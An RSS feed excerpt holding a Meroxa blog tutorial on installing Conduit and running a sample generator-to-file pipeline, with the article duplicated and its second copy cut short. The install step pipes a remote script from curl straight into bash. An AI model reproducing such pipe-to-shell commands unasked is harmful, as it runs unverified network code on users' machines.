&lt;p&gt;&lt;em&gt;Ready to future-proof your data architecture? Let&apos;s talk about how Meroxa can help you build a foundation for real-time success. &lt;a href=&quot;https://meroxa.com/demo&quot;&gt;Schedule a conversation&lt;/a&gt; with our solutions architects today.&lt;/em&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building Your First Real-Time Pipeline with Meroxa's Conduit OSS: A Step-by-Step Guide]]></title><description><![CDATA[This blog provides a comprehensive, beginner-friendly guide to building your first real-time data pipeline using Meroxa’s open-source Conduit platform. Designed to simplify real-time data integration, Conduit empowers developers to move data seamlessly between systems with minimal setup. The guide walks readers through the installation, initialization, pipeline configuration, and execution steps. Starting with a sample pipeline that streams generated data to a destination file, it showcases Conduit’s intuitive configuration process and highlights the flexibility to handle structured, scalable data in real time. By the end, readers will have a fully functioning pipeline ready to deliver actionable insights and the foundational knowledge to explore advanced configurations. Whether you're new to real-time data or looking for a reliable integration tool, this guide demonstrates how Conduit makes real-time pipelines accessible to everyone.]]></description><link>https://meroxa.com/blog/building-your-first-real-time-pipeline-with-meroxas-conduit-oss-a-step-by-step-guide</link><guid isPermaLink="false">https://meroxa.com/blog/building-your-first-real-time-pipeline-with-meroxas-conduit-oss-a-step-by-step-guide</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Mon, 13 Jan 2025 12:58:00 GMT</pubDate><content:encoded>&lt;h3&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Real-time data pipelines have become essential for modern applications, enabling businesses to process and analyze data instantly for critical decision-making. For beginners and developers, getting started with real-time pipelines may seem daunting, but with Conduit OSS (open source), it’s easier than ever to build a seamless and reliable data stream.&lt;/p&gt;
&lt;p&gt;This guide will walk you through the process of building your first real-time data pipeline using Meroxa’s Conduit OSS tool from setup to deployment. By the end, you’ll have a functioning pipeline that ingests, processes, and delivers data in real time.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;What is Conduit?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit is an open-source, real-time data integration tool designed for simplicity and scalability. With its lightweight architecture and developer-friendly tools, Conduit provides:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ease of Use&lt;/strong&gt;: Set up pipelines with intuitive configurations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Processing&lt;/strong&gt;: Move data instantly between systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability&lt;/strong&gt;: Handle large data volumes effortlessly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexibility&lt;/strong&gt;: Integrate with multiple data sources and sinks.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Install Conduit&lt;/h2&gt;
&lt;p&gt;If you&apos;re using a macOS or Linux system, you can install Conduit with the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ curl https://conduit.io/install.sh | bash
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you&apos;re not using a macOS or Linux system, you can still install Conduit by following one of the other options listed on &lt;a href=&quot;https://conduit.io/docs/installing-and-running&quot;&gt;our installation page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Conduit binary contains both the Conduit service and the Conduit CLI, which you can use to interact with Conduit.&lt;/p&gt;
&lt;h2&gt;Initialize Conduit&lt;a href=&quot;https://conduit.io/docs/getting-started#initialize-conduit&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;First, let&apos;s initialize the working environment:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit init

Created directory: processors
Created directory: connectors
Created directory: pipelines
Configuration file written to conduit.yaml

Conduit has been initialized!

To quickly create an example pipeline, run &apos;conduit pipelines init&apos;.
To see how you can customize your first pipeline, run &apos;conduit pipelines init --help&apos;.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;conduit init&lt;/code&gt; creates the directories where you can put your pipeline configuration files, connector binaries, and processor binaries. There&apos;s also a &lt;code class=&quot;language-text&quot;&gt;conduit.yaml&lt;/code&gt; that contains all the configuration parameters that Conduit supports.&lt;/p&gt;
&lt;p&gt;In this guide, we&apos;ll only use the &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; directory, since we won&apos;t need to install any additional connectors or change Conduit&apos;s default configuration.&lt;/p&gt;
&lt;h2&gt;Build a pipeline&lt;a href=&quot;https://conduit.io/docs/getting-started#build-a-pipeline&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Next, we can use the Conduit CLI to build the example pipeline:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit pipelines init
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;conduit pipelines init&lt;/code&gt; builds an example that generates flight information from an imaginary airport every second. Use &lt;code class=&quot;language-text&quot;&gt;conduit pipelines init --help&lt;/code&gt; to learn how to customize the pipeline.&lt;/p&gt;
&lt;p&gt;In the &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; directory, you&apos;ll notice a new file, &lt;code class=&quot;language-text&quot;&gt;pipeline-generator-to-file.yaml&lt;/code&gt;, that contains our pipeline&apos;s configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2.2&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;generator-to-file&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;generator&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Generate field &apos;airline&apos; of type string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.options.airline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;string&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Generate field &apos;scheduledDeparture&apos; of type &apos;time&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.options.scheduledDeparture&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;time&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# The format of the generated payload data (raw, structured, file).&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;structured&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# The maximum rate in records per second, at which records are&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# generated (0 means no rate limit).&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: float&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;rate&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;1&apos;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;destination
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;file&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Path is the file path used by the connector to read/write records.&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;./destination.txt&apos;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The configuration above tells us some basic information about the pipeline (ID and name) and that we want Conduit to start the pipeline automatically (&lt;code class=&quot;language-text&quot;&gt;status: running&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;Then we see a source connector that uses the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;generator&lt;/code&gt; plugin&lt;/a&gt;, a built-in plugin that generates random data. The source connector&apos;s settings translate into: generate structured data, at 1 record per second, where each record contains an &lt;code class=&quot;language-text&quot;&gt;airline&lt;/code&gt; field (type: string) and a &lt;code class=&quot;language-text&quot;&gt;scheduledDeparture&lt;/code&gt; field (type: time).&lt;/p&gt;
&lt;p&gt;What follows is a destination connector, to which the data will be written. It uses the &lt;code class=&quot;language-text&quot;&gt;file&lt;/code&gt; plugin, a built-in plugin that writes all incoming data to a file. It has a single configuration parameter: the path to the file where the records will be written.&lt;/p&gt;
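&lt;p&gt;As a quick experiment, you could extend the generated records with an additional field by adding another &lt;code class=&quot;language-text&quot;&gt;format.options.*&lt;/code&gt; setting to the source connector. The sketch below is illustrative only; the &lt;code class=&quot;language-text&quot;&gt;flightNumber&lt;/code&gt; field and the &lt;code class=&quot;language-text&quot;&gt;int&lt;/code&gt; type name are assumptions, so check the generator plugin&apos;s documentation for the supported field types:&lt;/p&gt;

```yaml
settings:
  # Existing fields from the example pipeline
  format.options.airline: 'string'
  format.options.scheduledDeparture: 'time'
  # Hypothetical extra field; 'int' is an assumed type name, verify it
  # against the generator plugin's documentation before using it
  format.options.flightNumber: 'int'
  format.type: 'structured'
  rate: '1'
```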
&lt;h2&gt;Run Conduit&lt;a href=&quot;https://conduit.io/docs/getting-started#run-conduit&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;With the pipeline configuration ready, we can run Conduit:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Conduit is now running the pipeline. Let&apos;s check the contents of &lt;code class=&quot;language-text&quot;&gt;destination.txt&lt;/code&gt; using:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;tail -f destination.txt | jq
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Every second, you should see a JSON object like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
  &quot;position&quot;: &quot;MjU=&quot;,
  &quot;operation&quot;: &quot;create&quot;,
  &quot;metadata&quot;: {
    &quot;conduit.source.connector.id&quot;: &quot;example-pipeline:example-source&quot;,
    &quot;opencdc.createdAt&quot;: &quot;1730801194148460912&quot;,
    &quot;opencdc.payload.schema.subject&quot;: &quot;example-pipeline:example-source:payload&quot;,
    &quot;opencdc.payload.schema.version&quot;: &quot;1&quot;
  },
  &quot;key&quot;: &quot;cHJlY2VwdG9yYWw=&quot;,
  &quot;payload&quot;: {
    &quot;before&quot;: null,
    &quot;after&quot;: {
      &quot;airline&quot;: &quot;wheelmaker&quot;,
      &quot;scheduledDeparture&quot;: &quot;2024-11-05T10:06:34.148469Z&quot;
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The JSON object you see is the &lt;a href=&quot;https://conduit.io/docs/using/opencdc-record&quot;&gt;OpenCDC record&lt;/a&gt; that holds the data being streamed, along with additional metadata. In the &lt;code class=&quot;language-text&quot;&gt;.payload.after&lt;/code&gt; field you will see the user data that was generated by the &lt;code class=&quot;language-text&quot;&gt;generator&lt;/code&gt; connector:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;airline&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;wheelmaker&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token property&quot;&gt;&quot;scheduledDeparture&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2024-11-05T10:06:34.148469Z&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
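&lt;p&gt;Besides &lt;code class=&quot;language-text&quot;&gt;jq&lt;/code&gt;, you can also consume the file output programmatically. The following Python sketch parses each line of &lt;code class=&quot;language-text&quot;&gt;destination.txt&lt;/code&gt; as an OpenCDC record and extracts the generated data from &lt;code class=&quot;language-text&quot;&gt;.payload.after&lt;/code&gt; (it assumes one JSON record per line, as the file connector writes them in this example):&lt;/p&gt;

```python
import json


def extract_payloads(lines):
    """Extract the generated data (.payload.after) from OpenCDC records.

    Assumes each non-empty line is one OpenCDC record serialized as JSON,
    matching the file destination connector's output in this example.
    """
    payloads = []
    for line in lines:
        line = line.strip()
        if not line:
            continue  # skip blank lines
        record = json.loads(line)
        payloads.append(record["payload"]["after"])
    return payloads


# Usage (with Conduit running in another terminal):
#     with open("destination.txt") as f:
#         for payload in extract_payloads(f):
#             print(payload)
```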
&lt;p&gt;The pipeline will keep streaming data from the generator source connector to the file destination connector as long as Conduit is running. To stop Conduit, press &lt;code class=&quot;language-text&quot;&gt;Ctrl + C&lt;/code&gt; (or the equivalent on your operating system). This triggers a graceful shutdown: Conduit stops reading from source connectors and waits for records still in the pipeline to be acknowledged. The next time Conduit starts, it will resume reading data from where it stopped.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Building a real-time pipeline with Meroxa’s Conduit OSS is straightforward, even for beginners. By following this guide, you’ve set up a reliable and scalable pipeline that delivers real-time insights. Ready to explore more? Check out Conduit’s &lt;a href=&quot;https://conduit.io/docs&quot;&gt;documentation&lt;/a&gt; for advanced configurations and integrations.&lt;/p&gt;
&lt;p&gt;Start building your data pipelines today and unlock the potential of real-time data! For more information on our managed platform options &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;request a demo.&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building Your First Real-Time Pipeline with Meroxa's Conduit OSS: A Step-by-Step Guide]]></title><description><![CDATA[This blog provides a comprehensive, beginner-friendly guide to building your first real-time data pipeline using Meroxa’s open-source Conduit platform. Designed to simplify real-time data integration, Conduit empowers developers to move data seamlessly between systems with minimal setup. The guide walks readers through the installation, initialization, pipeline configuration, and execution steps. Starting with a sample pipeline that streams generated data to a destination file, it showcases Conduit’s intuitive configuration process and highlights the flexibility to handle structured, scalable data in real time. By the end, readers will have a fully functioning pipeline ready to deliver actionable insights and the foundational knowledge to explore advanced configurations. Whether you're new to real-time data or looking for a reliable integration tool, this guide demonstrates how Conduit makes real-time pipelines accessible to everyone.]]></description><link>https://meroxa.com/blog/building-your-first-real-time-pipeline-with-meroxas-conduit-oss-a-step-by-step-guide</link><guid isPermaLink="false">https://meroxa.com/blog/building-your-first-real-time-pipeline-with-meroxas-conduit-oss-a-step-by-step-guide</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Mon, 13 Jan 2025 12:58:00 GMT</pubDate><content:encoded>&lt;h3&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Real-time data pipelines have become essential for modern applications, enabling businesses to process and analyze data instantly for critical decision-making. For beginners and developers, getting started with real-time pipelines may seem daunting, but with Conduit OSS (open source), it’s easier than ever to build a seamless and reliable data stream.&lt;/p&gt;
&lt;p&gt;This guide will walk you through the process of building your first real-time data pipeline using Meroxa’s Conduit OSS tool from setup to deployment. By the end, you’ll have a functioning pipeline that ingests, processes, and delivers data in real time.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;What is Conduit?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit is an open-source, real-time data integration tool designed for simplicity and scalability. With its lightweight architecture and developer-friendly tools, Conduit provides:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ease of Use&lt;/strong&gt;: Set up pipelines with intuitive configurations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Processing&lt;/strong&gt;: Move data instantly between systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability&lt;/strong&gt;: Handle large data volumes effortlessly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexibility&lt;/strong&gt;: Integrate with multiple data sources and sinks.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Install Conduit&lt;/h2&gt;
&lt;p&gt;If you&apos;re using a macOS or Linux system, you can install Conduit with the following command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ curl https://conduit.io/install.sh | bash
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you&apos;re not using a macOS or Linux system, you can still install Conduit by following one of the other options listed on &lt;a href=&quot;https://conduit.io/docs/installing-and-running&quot;&gt;our installation page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Conduit binary contains both the Conduit service and the Conduit CLI, which you can use to interact with Conduit.&lt;/p&gt;
&lt;h2&gt;Initialize Conduit&lt;a href=&quot;https://conduit.io/docs/getting-started#initialize-conduit&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;First, let&apos;s initialize the working environment:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit init

Created directory: processors
Created directory: connectors
Created directory: pipelines
Configuration file written to conduit.yaml

Conduit has been initialized!

To quickly create an example pipeline, run &apos;conduit pipelines init&apos;.
To see how you can customize your first pipeline, run &apos;conduit pipelines init --help&apos;.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;conduit init&lt;/code&gt; creates the directories where you can put your pipeline configuration files, connector binaries, and processor binaries. There&apos;s also a &lt;code class=&quot;language-text&quot;&gt;conduit.yaml&lt;/code&gt; that contains all the configuration parameters that Conduit supports.&lt;/p&gt;
&lt;p&gt;In this guide, we&apos;ll only use the &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; directory, since we won&apos;t need to install any additional connectors or change Conduit&apos;s default configuration.&lt;/p&gt;
&lt;h2&gt;Build a pipeline&lt;a href=&quot;https://conduit.io/docs/getting-started#build-a-pipeline&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Next, we can use the Conduit CLI to build the example pipeline:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit pipelines init
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;conduit pipelines init&lt;/code&gt; builds an example that generates flight information from an imaginary airport every second. Use &lt;code class=&quot;language-text&quot;&gt;conduit pipelines init --help&lt;/code&gt; to learn how to customize the pipeline.&lt;/p&gt;
&lt;p&gt;In the &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; directory, you&apos;ll notice a new file, &lt;code class=&quot;language-text&quot;&gt;pipeline-generator-to-file.yaml&lt;/code&gt;, that contains our pipeline&apos;s configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2.2&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;pipeline
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;generator-to-file&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;generator&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Generate field &apos;airline&apos; of type string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.options.airline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;string&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Generate field &apos;scheduledDeparture&apos; of type &apos;time&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.options.scheduledDeparture&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;time&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# The format of the generated payload data (raw, structured, file).&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;structured&apos;&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# The maximum rate in records per second, at which records are&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# generated (0 means no rate limit).&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: float&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;rate&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;1&apos;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;destination
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;file&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Path is the file path used by the connector to read/write records.&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Type: string&lt;/span&gt;
          &lt;span class=&quot;token comment&quot;&gt;# Optional&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;./destination.txt&apos;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The configuration above tells us some basic information about the pipeline (ID and name) and that we want Conduit to start the pipeline automatically ( &lt;code class=&quot;language-text&quot;&gt;status: running&lt;/code&gt;).&lt;/p&gt;
